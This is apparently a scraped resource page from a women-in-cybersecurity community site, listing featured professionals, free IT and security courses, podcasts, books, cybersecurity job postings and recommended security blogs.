Cyber Security Test Analyst at Insurance Australia Group (IAG)

3. FAVOUR UGWOKE

SOC Analyst at SHELT Global Ltd

4. NIKKI ROBINSON

STSM and Senior Manager, IBM / Adjunct Faculty, UMGC at Maryland

5. DOROTA KOZLOWSKA

Penetration Testing and Social Engineering Specialist | Security Analyst at Black Hills Information Security

6. RAMONA RATIU

MS, CISM, CISA, GCCC, GSTRT Cyber Security | Adjunct Professor | Board Strategic Advisor | Mentor | SheLeadsTech Ambassador

7. ESTHER ROBERTS

Cybersecurity Analyst and Penetration Tester at Port Harcourt

8. LIHANSA MINRADIE JAYASINGHE

Associate Engineer - Information Security at CryptoGen

9. STACIA MASON

GRC Analyst at Acrisure

10. CRAIG FORD

Head Unicorn – Cofounder and Executive Director, Cyber Unicorns. Australian Best Selling Author of A Hacker I Am, Foresight and The Shadow World book series. vCISO – Hungry Jacks, Wesley Mission, PCYC and Baidam Solutions

11. MARCUS LAVALLE-SMITH

Principal Consultant at Decipher Bureau (Cyber Security Recruitment). Harry Potter fan.

12. JO STEWART-RATTRAY

Oceania Ambassador, ISACA

13. LISA VENTURA

Founder, Cyber Security Unity

14. SIMON CARABETTA

Manager Cyber SecOps and Incident Response at East Metropolitan Health Service

15. MARY KAMBO

Cybersecurity Engineer and Consultant

16. REBBECA ROBERTS

Regional Sales Manager - Australia & New Zealand at Exabeam

17. ERIN GRIPPO

Senior Manager, Product Operations at Brivo

18. REYHAN USMAN

EOC Information Technology/Administrative Coordinator at eHealth Africa

19. PAMEELA GEORGE

Customer Service Assistant - Carrolls Irish Gifts

20. ANITA NNAMDI

SOC Analyst

21. MARISE ALPHONSO

Information Security Professional

22. FLORENCE KABONA

Penetration tester

23. KAREN STEPHENS

CEO and co-founder of BCyber

24. LUNYOLO EVELYN KIRABO

Information Systems and Technology student at Makerere University

25. BANDANA KAUR

High school student in India

26. SOPHIA ASPERA

Bachelor of Information Technology student at Macquarie University

27. LISA ROTHFIELD-KIRSCHNER

Author of How We Got Cyber Smart | Amazon Bestseller

THE LEARNING HUB

INTRODUCTION TO INFORMATION TECHNOLOGY

The course provides students with an overview of IT systems (including software and hardware) as well as database management, networking, ethics, privacy, and security.

CS50’S INTRODUCTION TO COMPUTER SCIENCE

The on-campus version of CS50 is Harvard’s largest and most popular course, and this free online version is the same one taught in the classroom. It’s comprehensive, covering programming languages, algorithms, data structures, resource management, web development, security, and more. Anyone who wants to learn internet technology basics at no cost from one of the nation’s top Ivy League schools would do well to enroll.

TECHNOLOGY COURSES

Graduates of Free Code Camp have gotten jobs with tech companies like Microsoft, Google, and Apple, and you could be next. The site has long been considered an authority site for all levels to learn coding, and they offer some of the best free online technology courses around.

INFORMATION TECHNOLOGY FOUNDATIONS

This is an excellent self-paced course brought to you by Western Governors University and presented on the edX platform. It’s one of the top free online technology courses we have found for beginners, as it examines the discipline as a whole.

BUSINESS TECHNOLOGY MANAGEMENT SPECIALIZATION

This specialization in business technology management consists of six courses, each of which can be taken in audit mode for free on the Coursera platform. Free mode does not allow students to participate in capstone projects or earn certification, but the learning components of the courses are still available at no charge.

SOFTWARE TESTING

This terrific intermediate technology course on Udacity will give students a basic introduction to testing software. Entirely free, it is a one-month long program taught by industry pros. Students will be deliberately breaking software and identifying bugs on this hands-on course.

INTRODUCTION TO CYBERCRIME

Begin your journey into cybercrime with this free cybercrime course. Explore the various types of cyberattacks faced by organisations today. Understand the intricacies of cybersecurity threats and discover practical preventive measures. Whether you're new to the field or seeking to broaden your knowledge, this course provides essential insights to empower you in defending against cyber threats.

MANAGING CYBERSECURITY INCIDENTS AND DISASTERS

Most organisations plan for routine operations, but what happens when unexpected events overtake the routine? This course examines contingency planning used to prepare for and manage non-normal operations, including cybersecurity incidents (like hacking attempts, web site defacement, denial of service attacks and information disclosures) as well as other natural and man-made cybersecurity disasters.

COMPUTER FORENSICS

Learners in this class study digital forensics fundamentals, including the four-step procedure concept. The course then moves into Unix/Linux fundamentals and Windows forensics and investigations. This course makes up part of NYU's five graduate-level course sequence leading to the MicroMasters® program in cybersecurity.

BUILDING A CYBERSECURITY TOOLKIT

If you own an information asset that’s valuable enough to the right adversary, it’s only a matter of time before there’s a breach. Today’s technologies attempt to keep adversaries out, but the sad fact is they will inevitably be defeated. This means a successful cybersecurity professional needs to have an expanded arsenal in their toolkit that extends far beyond technical proficiency.

INTRODUCTION TO COMPUTATIONAL THINKING AND DATA SCIENCE

There may be no better place to learn technology skills than the mother of all tech schools, MIT. If you’ve ever wanted those three letters next to your name, bragging rights are yours by taking this course offered through the school’s OpenCourseWare (OCW) program.

NEW TECHNOLOGIES FOR BUSINESS LEADERS

For entrepreneurs and business leaders looking for a broader understanding of the newest information technologies and how they can apply to business, this excellent course is the perfect fit. From virtual reality to blockchain to artificial intelligence, students will learn about and be empowered to embrace these emerging technologies as they improve their business practices.

DARKNET DIARIES

With Jack Rhysider

Since 2017, Darknet Diaries has investigated some of the most noteworthy stories related to the dark side of the internet, using a storytelling style that’s easy to follow for technical and non-technical listeners alike.

SECURITY NOW

With Leo Laporte

The CyberWire is a cybersecurity-focused news service, and the CyberWire Daily Podcast delivers a rundown of the top cyber news each day of the week. It requires some baseline industry knowledge, but it’s a great way for security professionals to stay on top of InfoSec current events.

ELEVATE

With Kellie Kwarteng

The Elevate - Women in Tech Podcast is hosted by Halzak Founder Kellie Kwarteng. The episodes will feature inspiring Women in Tech who will be sharing their journeys and tips on how to navigate a career in tech.

THE TRAILBLAZERS JOURNEY

With Saima Majid

Do you have a curiosity about people, life and the world around you? Do you care about the issues that are affecting our world today? Are you passionate about self development? Does this adventure that we call life excite you?

RISE AND THRIVE

With Pamela Cass and Natalie Davis

Life throws curveballs, doesn't it? But what if you could turn those tough moments into stepping stones for growth? That's exactly what we explore on the Reignite Resilience podcast.

LET FEAR BOUNCE

With Kim Lengling

Welcome to Let Fear Bounce. Motivational and inspirational stories shared by people from around the world who have let fear bounce. I'm also going to throw in some pet stories. Why? Because I like to talk about my dog and you don't want to hear about me all the time!

SHELEADER IN A SHELL

With BCWT

SHEleader in a SHEll is a BCWT format that creates a bridge to the second international SHEleader@ digital conference.

FEMPIRE

With fempire

This podcast features front end women in tech. A monthly conversation with women in JavaScript talking about all things front end.

CYBERSECURITY TODAY

With Jim Love

Updates on the latest cybersecurity threats to businesses, data breach disclosures, and how you can secure your firm in an increasingly risky time.

CAREER DEVELOPMENT PODCASTS FOR EARLY CAREER WOMEN

With 9 to 5ish with theSkimm

In this podcast, theSkimm cofounders Carly Zakin and Danielle Weisberg sit down with women leaders from every industry imaginable, chatting about helpful topics for women just starting out in their careers.

CYBER SECURITY SAUNA

With Janne Kauhanen

Cyber Security Sauna brings you expert guests with sizzling insight into the latest information security trends and topics. WithSecure's Janne Kauhanen hosts the show to make sure you know all you need to about the hotter-than-ever infosec game. Join us as we sweat out the hot topics in security.

HOW WOMEN CAN BREAK THROUGH BARRIERS IN THE SECURITY INDUSTRY

With Aileen Garcia

Women have made significant strides in the security industry in recent years. Greater efforts by organisations like SIA and ASIS have been made to encourage women to enter the cybersecurity workforce, building foundational resources they did not have before.

BRAVE

Author // Sheila Vijeyarasa

Brave: Courageously live your truth sets out a clear roadmap for women to reclaim their personal power, providing them with the knowledge and courage to step into an authentic life. Learn how to listen to your intuition, follow your soul purpose and bravely live your truth.

EMPOWERMENT ECHOES & RESILIENCE REFLECTIONS

Author // Shannon Avery Briggs

The 'Empowerment Echoes and Resilience Reflections Journal' is a thoughtfully designed tool for personal growth, self-discovery, and healing. Created by Shannon Avery Briggs, a survivor and a beacon of resilience, this journal is a companion for anyone seeking to embark on a journey of empowerment and self-improvement.

WOMEN OF RESILIENCE: OVERCOMING OBSTACLES WITH GRACE

Author // Renee McLaurin

"Women of Resilience: Overcoming Obstacles with Grace" is a compelling book that embarks on a profound journey into the lives of women who have faced life's myriad challenges with unwavering strength and indomitable spirit.

BLACK HAT BASH

Author // Nick Aleks

In the hands of the penetration tester, bash scripting becomes a powerful offensive security tool. In Black Hat Bash, you'll learn how to use bash to automate tasks, develop custom tools, uncover vulnerabilities, and execute advanced, living-off-the-land attacks against Linux servers.

UNDERSTAND THE CYBER ATTACKER MINDSET: BUILD A STRATEGIC SECURITY PROGRAMME TO COUNTERACT THREATS

Author // Sarah Armstrong-Smith

To counteract a cyber attacker, organisations need to learn to think like one. Understand the Cyber Attacker Mindset explores the psychology of cyber warfare and how organisations can defend themselves against attacks.

THE CYBER EFFECT: A PIONEERING CYBERPSYCHOLOGIST EXPLAINS HOW HUMAN BEHAVIOUR CHANGES ONLINE

Author // Mary Aiken

Dr Mary Aiken is the world's leading expert in forensic cyberpsychology - a discipline that combines psychology, criminology and technology to investigate the intersection between technology and human behaviour. In this, her first book, Aiken has created a starting point for all future conversations about how the Internet is shaping our perception of the world, development and behaviour, societal norms and values, children, safety and security.

BUY THE BOOK

THE RISE OF THE CYBER WOMEN

Author // Lisa Ventura

The Rise of the Cyber Women series collects and celebrates interviews with professional women working across the cyber security field. In this third volume we meet women at all stages of their careers and covering the full range of disciplines.

CYBERSPIRACY:

Author // Wolf O'Rourc

She flees from bullying into her dream world of dashing master spy dolls, blue-haired Katy Perry Barbies, and pink Hello Kitty dresses. But behind the virtual disguise of six-foot-four hunk Cowabunga Dude, she hacks her way across the Dark Net.

BUY THE BOOK

THE SHADOW WORLD

Authors // Craig Ford and Caity Randall

Much like in your house, shadows can be scary until you turn the light on. The same goes for the online world. Sometimes when we do not know what we are looking at or dealing with, it can be overwhelming and potentially dangerous.

BUY THE BOOK

CYBER HEROES: KIDS DEFENDING THE DIGITAL REALM

Author // Valarian Couch

Cyber Heroes: Kids Defending The Digital Realm is a unique book that teaches kids about staying safe online. It's written for children to help them understand the internet better and how to protect themselves from dangers. The book explains in simple terms how to be smart and safe when using the internet, social media, and games.

BUY THE BOOK

INCLUDED

Author // Jayneen Sanders

The aim of this story is to ensure all kids understand that kids with disability are just like kids everywhere. They love playing games, books, making stuff and being silly. They have things they are good at and things they need to work on. And just like kids everywhere they want to feel safe, loved and included.

BUY THE BOOK

CASTLE DEFENDERS: WHAT DO CYBER PARENTS DO?

Authors // Dana Meschiany and Pentera

Mommy is late for dinner again, and Emma and Oliver are frustrated. Daddy comes to the rescue with spaghetti and an enchanting tale of brave knights and mysterious castles, revealing how he and Mommy work tirelessly to protect the people on the internet from bad hackers and other online threats.

BUY THE BOOK

JOB BOARD

INTERN - TECHNOLOGY CONSULTING, CYBERSECURITY (SUMMER 2025)

| EY

FULL TIME SINGAPORE

THE OPPORTUNITY:

• Cyber threats, social media, massive data storage, privacy requirements and continuity of the business as usual require heavy information security measures. As a cybersecurity professional in EY Singapore, you will have the chance to work with an international connected team of specialists in serving our clients through providing independent assessments or implementation of cyber solutions that contribute toward their business resilience.

YOUR KEY RESPONSIBILITIES:

• Core Cybersecurity

• You will work with your project team and the client to execute engagements which help the client to measure the effectiveness of its cybersecurity programs, assess the cybersecurity risk of a client; evaluate the maturity of a security program, test the effectiveness of cyber controls, assist the client in complying with the various cyber policies and regulations, and help implement new cyber control processes and tools to perform more effective cyber risk management.

APPLY HERE

CYBER SECURITY STUDY & INTERNSHIP | REFONTE INFINI-INFINIMENT GRAND

REMOTE NEW ZEALAND

JOB OVERVIEW:

Refonte's RIGTIP (Refonte Global Training & Internship Program) offers a unique Cybersecurity and DevSecOps training opportunity. In this comprehensive program, you’ll gain hands-on experience with real-world cybersecurity projects in a flexible, remote work environment. Collaborate with a diverse global team across Oceania, Asia, Europe, and the Americas as you build advanced skills in DevSecOps and cybersecurity.

KEY RESPONSIBILITIES:

• Design and deploy DevSecOps CI/CD pipelines incorporating Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), and Interactive Application Security Testing (IAST) to secure the software development lifecycle.

• Implement OWASP (Open Worldwide Application Security Project) practices in real-world projects to strengthen application security.

• Develop secure systems and expand your expertise in vulnerability assessment, reconnaissance, and risk mitigation to protect infrastructure and digital assets.

• Execute practical exploits to analyze and bolster system defenses.

• Conduct comprehensive risk assessments and develop threat models for robust web application security.

• Build and maintain a strategic vulnerability management framework.

• Utilize open-source intelligence tools for passive reconnaissance and execute footprinting as part of ethical hacking.

• Master scanning techniques using NMAP and NPING, conducting scans on target networks beyond IDS and firewall protections.

• Deepen your understanding of web applications, web servers, their potential vulnerabilities, and proactive security measures.

APPLY HERE

MANAGER, INFRASTRUCTURE SECURITY | GITLAB

REMOTE NEW ZEALAND

WHAT YOU’LL DO

• Contribute to the infrastructure security team’s vision and strategic roadmap

• Own and be responsible for securing

    • GitLab’s customer-facing infrastructure which encompasses our multi-tenant, dedicated, government, and on-prem architectures.

    • Infrastructure that supports GitLab’s software supply chain.

• Provide professional guidance and input on infrastructure security within and outside of your team

• Collaborate with other security teams in support of

    • Cross-team security efforts

    • Process improvements

    • Driving down risk across the organization

• Build collaborative cross-functional partnerships with teams across

    • Infrastructure Engineering

    • Engineering and Development

    • Product Management; and

    • Legal

• Manage an existing high performing team of infrastructure security professionals along with hiring new members as appropriate

• Lead and mentor your team by

    • helping grow their skills and experience

    • fostering a culture of continuous improvement

    • holding regular 1:1’s

    • being your team’s role model in terms of exemplifying GitLab company values, positive thinking, and managing conflict

• Establish and implement security policies, procedures, standards, and guidelines in support of infrastructure security

APPLY HERE

SENIOR SECURITY ANALYST (DETECTION ARCHITECT) | LAB3

CONTRACT AUSTRALIA

• This is an initial 6-month contract role. An AGSVA clearance is advantageous but not required

• This person (level 3) will hunt down threats with automation and leverage KQL expertise to craft powerful analytic detection rules within Microsoft Sentinel (Azure), automating threat hunting and refining strategies to stay ahead of the latest attacks. You'll be a key player, utilizing your custom detection rules to provide deep insights and support rapid incident resolution through automated workflows.

• You'll work closely with our SOC team, sharing knowledge and best practices while staying up-to-date with the evolving threat landscape. This will include leveraging automation tools to streamline your tasks and enhance our security posture.

• With years of cybersecurity experience and a proven track record in threat detection and response, you'll be a valuable asset to our SOC team, where your KQL/SIEM expertise and analytical skills will be essential in protecting our organization from emerging threats, while your ability to leverage automation will drive efficiency and effectiveness.

APPLY HERE


FREELANCE CYBERSECURITY EXPERT - AI TUTOR | MINDRIFT

REMOTE NEW ZEALAND

ABOUT THE ROLE

Generative AI models are improving very quickly, and one of our goals is to make them capable of addressing specialized questions and achieving complex reasoning skills.

In this role, you will use your skills to train AI systems to identify and exploit security weaknesses in a controlled and ethical manner. Your work will involve:

• Design and implement an indirect prompt injection attack that will expose a vulnerability of the user agent.

• Correcting the AI's responses based on domain-specific knowledge

REQUIRED QUALIFICATIONS:

• Proven experience in penetration testing, ethical hacking, or a related cybersecurity field

• Proficiency with penetration testing tools such as Metasploit, Burp Suite, Nessus, and Nmap

• Strong understanding of networking protocols, operating systems, and web application security

• Knowledge of scripting languages (e.g., Python, PowerShell, Bash)

• Familiarity with OWASP Top Ten, MITRE ATT&CK Framework, and other security frameworks

• Relevant certifications such as CEH, OSCP, OSWE, or CISSP (preferred)

• Proficiency in English: advanced (C1) or above

• Excellent analytical and problem-solving skills

• Strong communication skills for reporting findings and collaborating with teams

• Our freelance role is fully remote, so you just need a laptop, internet connection, time available and enthusiasm to take on a challenge

CYBERSECURITY INFRASTRUCTURE | KYNDRYL

FULL TIME SPAIN

• Kyndryl’s Security & Resiliency is one of our most critical practices, ensuring enterprises, regardless of their size and complexity, remain secure, available, reliable, and resilient. We take Cybersecurity seriously. We're not just invested; we're committed. We're not just protecting data; we're empowering. Kyndryl is committed to making the world safer, not only by investing in state-of-the-art services and technologies but also by empowering underserved communities with essential cyber skills.

• When you walk through our doors, you're not only joining a team but you're also becoming part of a legacy. Welcome to Kyndryl, where Cybersecurity isn't just a job – it’s a passion; a commitment to designing, running, and managing the most modern and reliable technology infrastructure that the world depends on every day.

• Join us as a Cybersecurity Infrastructure Professional, where you'll be entrusted with the crucial task of maintaining and enhancing the infrastructure that is the backbone of our cybersecurity operations for our Fortune 500 clients. You'll be responsible for the orchestration of infrastructure, keeping our systems protected from the relentless advances of physical and cyber adversaries.

• Your vigilance and technical expertise will be the shield that safeguards our computer systems, networks, and invaluable data from the threat of unauthorized access, theft, damage, and other malicious activities. Your domain will revolve around preserving the integrity of an IT infrastructure, the security of networks, and the sanctity of data.

• If you have a passion for cybersecurity and are looking for a role that combines cutting-edge technology with the thrill of safeguarding critical assets, then this role is your gateway to the world of cybersecurity heroism. Join us at Kyndryl, and let's build the future of digital security together.

APPLY HERE


TECHNOLOGY INFRASTRUCTURE & SYSTEMS SPECIALIST | MUFG BANK

FULL TIME SOUTH KOREA

ABOUT THE ROLE:

As one of the core infrastructure/operation members of Technology Infrastructure Services (TIS) of MUFG Seoul Branch:

• Responsible for providing secure and reliable system infrastructures such as servers, networks, stage, PC etc. and improving them with system management skill.

• Troubleshooting of incidents and consideration of HA/DR/BCP are included.

• Responsible for supporting and leading system development projects from system infrastructure and system operation point of view.

• Supporting to implement new project with an IT knowledge, industry trends and relevant laws & regulations.

• Working with regional office properly to support the implementation of regional projects at a branch level.

WHAT YOU WILL BE DOING:

• Based on in-depth understanding on branch strategy and initiatives, propose and promote strategic system initiatives

• Based on branch policy, establish systems and system platform

• Perform and behave as a core member to realize above

• Through efficient system operations and development, comply with the expense and investment budget and cut cost

• Minimize penalty cost close to zero because of system incidents and cyber security incidents

• Provide the environment of stable system operation to department of branch

• Work in partnership with colleagues across the various departments to support the implementation of regional projects at a branch level

• To realize advanced and efficient system operations and development, educate members and develop oneself

• Support, coach and guide team on complex IT Infrastructure issues

• Share movements and trends on HQ policy and cyber security risk, etc., proactively

WHAT WE ARE LOOKING FOR:

• Bachelor's degree or above

• Proven experience of managing infrastructure and project management

• Excellent communication skills both in verbal and written English

• Knowledge and skills on server, networking structure, project progress and management

• Overall understanding of infrastructure is required

• It would be ideal to have in-depth knowledge of networking

SECURITY ARCHITECTS | CGI

FULL TIME UNITED KINGDOM

• You’ll join a collaborative team of more than 230 members delivering 360° security services to clients across every domain that CGI operates in, from government, defence, healthcare and utilities to banking and financial services.

• As a Security Architect your innovative solutions and support will secure business systems, protecting what is most valuable to our clients.

• You’ll collaborate across enterprise architectures to produce end-to-end security designs, assisting on bids and proposals, as well as implementations and integrations. Liaising with stakeholders at all levels, you’ll help build the full landscape security view that underpins systems resilience and client confidence. We need senior members who are design authorities, and junior members to work alongside them, developing their skills and understanding.


CYBERSECURITY ENGINEER | DATA MANAGEMENT GROUP

FULL TIME UNITED STATES

DETAIL JOB DESCRIPTION

• Seeking a Mid-Cyber Security Engineer to plan and operate the security infrastructure and responses.

• The ideal candidate for this position has strong planning and operational experience with managing host-based security infrastructure, such as FireEye Endpoint HX, Cb App Control, MS Defender, and Symantec Endpoint Protection AND significant experience in managing network IDS/IPS systems, including FireEye NX and Cisco FIREPOWER appliances.

• MUST HAVE FIREEYE, FIREPOWER, CYBERARK

• Work from Home [WFH] - Client is on the east coast; you can work anywhere in the continental USA.

• 1099/C2C Preferred

• Excellent written and verbal communication skills are required.

RESPONSIBILITIES

Customer Centricity

• Identifies and evaluates security trends, gathers customer insights (e.g., feedback around technical preferences, environments, business needs, competitive landscape), and maps architecture and digital transformation solutions to customer’s business outcomes.

• Acts as the voice of the customer by driving new feedback, insights, and resources to add and prioritize; connecting with Global Security teams at Microsoft, Engineering and Product teams to remove blockers and influence the solution roadmap.

• Develops and expands existing impactful relationships with CISOs, security practitioners, C-level technical decision makers (TDMs), and business stakeholders.

• Uncovers, aggregates, and synthesizes data about customer’s security posture and roadmap, complex technical requirements and issues and various technical strategies being proposed.

• Actively listens, creates, and sustains constructive tension and trust with customers by respectfully challenging their decisions and/or areas where they might do more and encouraging them to consider alternative architectures/solutions and approaches.

• Addresses security requirements/issues/strategies with win-win technical architecture(s) and demonstrates and proves the capability and value of those solutions through design collaboration sessions with the customer.

• Supports customer skilling by leading discussions on technical delivery with other internal and external stakeholders as a technical thought leader to influence customer readiness.

• Guides other team members to focus on customer experience through efficient delivery and ensuring a seamless and connected customer experience and shares best practices with the wider internal team.

Business Impact

• Drives their team in operating and optimizing complex and high-impact situations for strategic customers in collaboration with internal stakeholders (e.g., STU, CSAM, other Account Team members, Product Groups).

• Anticipates and manages business and security risks, and adapts methodology (e.g. Zero Trust, Security Adoption Framework, SFI) and applies governance to identify, communicate, and minimize business and security risks.

• Leverages standard tools to ensure accurate opportunity and milestone execution and pipeline hygiene.

• Owns complex customer relationships to anticipate, identify, propose resolution, and lead removal of technical blockers through regular security reviews and check-ins to accelerate consumption and usage.

• Proactively uses deep knowledge of the security portfolio, services, and value propositions of Microsoft and its competitors in customer conversations and to propose and coach others to develop new solutions to scale across multiple customers while demonstrating the business case and presenting alternative scenarios.

• Creates opportunities to expand or accelerate security usage and consumption (including through security related managed intellectual property [VBD, DE, EDE]) and leads these customer conversations.

• Leads the adoption of Microsoft’s Security offerings based on analysis/differentiation of Microsoft and competitor products to influence the industry-wide direction for specific architecture(s).

Technical Leadership

• Leverages market insights to assist leadership in defining global security vision by identifying relevant areas in which to drive up-skilling. Role models effective security skilling and influences team to drive their own technical readiness. Drives and engages others to adapt to changes aligned with SA priorities. Acts as a mentor to less experienced colleagues by educating them on security and professional developmental concepts and sharing best practices.

• Leads virtual teams around technologies and customer challenges by sharing ideas, insights, and strategic, technical input with security teams, internal communities across the field, and the larger virtual team across Microsoft using knowledge of Microsoft architectures and their context in the competitive landscape.

• Organizes or presents at internal/industry security events (e.g., Ready, Build, Ignite, RSA, etc.). Demonstrates deep industry knowledge and drives recognition for Microsoft solutions through presentations and engagements with external audiences. Participates in external security community events (e.g., conferences, seminars, technical meetups, Webcasts, blogs, hackathons) and shares learnings across internal teams.

APPLY HERE

CYBER SECURITY MANAGER, VP, GCS SECURITY PLATFORMS | STATE STREET

FULL TIME IRELAND

WHAT WILL YOU BE RESPONSIBLE FOR

• Team leadership and management, developing better work practices and outputs to our internal customers

• Helping the team to grow, via positive feedback, training and skills enhancement

• Effective communication skills while collaborating across various departments in providing clear, regular updates related to issues

• Regularly engage with tools and operations teams, such as our Cyber Defence Team in Kilkenny, Ireland, to understand how to help them work more effectively through use of our platforms

• Perform analytics on previous incidents and usage patterns to better predict issues and take proactive actions

• Ownership of security tooling problems and incidents that impact our internal stakeholders

• Ensure the security of State Street by delivering the most capable and reliable security tools for our incident responders and threat hunters

• Monitor the coverage or visibility of our security platforms to ensure effective detection and response of host and network borne threats

• Contribute and lead projects that improve current capabilities, drive adoption, and enable future growth

• Represent the function at various project and stakeholder meetings

SOC L3 SECURITY ANALYST | NETSACH GLOBAL

FULL TIME INDIA

• 7+ years of professional experience in cybersecurity

• Professional experience as an SOC Analyst (L2 or L3)

• Experience as a threat researcher, hunter, or a similar role

• Advanced certifications such as SANS GIAC / GCIA / GCIH / CISSP / CISM or SIEM-specific training and certification. (Preferred with certifications on AZ-500, AZ-900 or SC-200)

• Proficiency in KQL queries for log search and rule creation in Sentinel and Defender for EDR

• Malware analysis and malware reverse engineering.

• Experience in CTF / bug bounty

• Experience in managing cybersecurity tools

• Experience in vulnerability analysis/management.

APPLY HERE

THE END OF AN ERA

This non-profit organisation was established to inspire and empower women working in technology around the world. Not only do they provide training, networking and mentoring opportunities for professionals themselves, they also educate companies around how to retain, hire and promote talented women.

FEMGINEER

Poornima Vijayashanker started Femgineer in 2007 as a creative platform for sharing her experiences working as the founding engineer with Mint.com. Thirteen years later, the organisation has developed into an education company for tech professionals wanting to build software products and companies.

SECURITY AFFAIRS

Security Affairs is a security blog written by Pierluigi Paganini, an ethical hacker, researcher, security evangelist, and analyst. On his blog, among the articles on security, you’ll also find regular interviews with hackers, useful cybersecurity. In 2016, this blog was awarded Best European Personal Security Blog.

READ BLOG

WILL AI REPLACE DEVELOPERS

Skillcrush is an online coding school that wants to make learning about technology accessible and enjoyable for everyone. With a special focus on under-represented groups including women and mothers returning to work, they call themselves a “school with a heart”.

READ BLOG


ARCHITECT SECURITY

This cybersecurity blog belongs to April C. Wright who is a speaker, teacher, community leader, and hacker with more than 25 years of experience in the information security industry. She teaches others how to use simple actions that can lead to a better and safer place.

READ BLOG


ALEYDA SOLIS

You already know how important SEO is for getting organic traffic to your blog from the search results. Aleyda Solis, an SEO expert and professional speaker, will provide you with in-depth information and guides on search engine optimization. She is an inspiring personality to follow.

READ BLOG

ELIE BURSZTEIN’S BLOG

Elie works at Google and leads the company’s anti-abuse research team, focused on protecting users against cybercriminal activities and Internet threats. His personal blog focuses on trending topics in cybersecurity such as Artificial Intelligence, network security, account security, and many more that could help users learn how to stay safe online.

READ BLOG

BLEEPING COMPUTER

Another fantastic resource is Bleeping Computer, a technical support website and a self-education tool. Do read their cybersecurity guides, forums, tutorials, and more.

GIRL TALK HQ

Asha Dahya grew up with many challenges and faced numerous barriers to get what she wanted. She started Girl Talk HQ, one of the best female empowerment blogs, to help amplify the voice of all those who go through difficulties and desire to grow. In this blog, you can expect honest and inspiring stories of women around the world. This is the best blog for women in their 20s.

READ BLOG

KREBS ON SECURITY

Brian Krebs is the man behind Krebs on Security. After being hacked in 2001, he became personally interested in online security. He’s one of the well-known names in today’s security landscape. Krebs covers topics from the latest threats, privacy breaches, and cyber-criminals, as well as major security news and alerts. He’s also a book author.

READ BLOG

ZERO DAY

By Zero Day

The Zero Day security blog is important for everyone in the IT industry. This information security blog belongs to ZDNet, and you should follow it to stay on top of the latest security analysis, software vulnerabilities, malware attacks, and network threats.

THE REGISTER

By The Register

The Register is another top online tech publication, with more than 9 million monthly unique visitors. Here you’ll find independent news, views, and reviews on the latest in the IT industry, and its security section brings the latest news from the industry.

READ BLOG

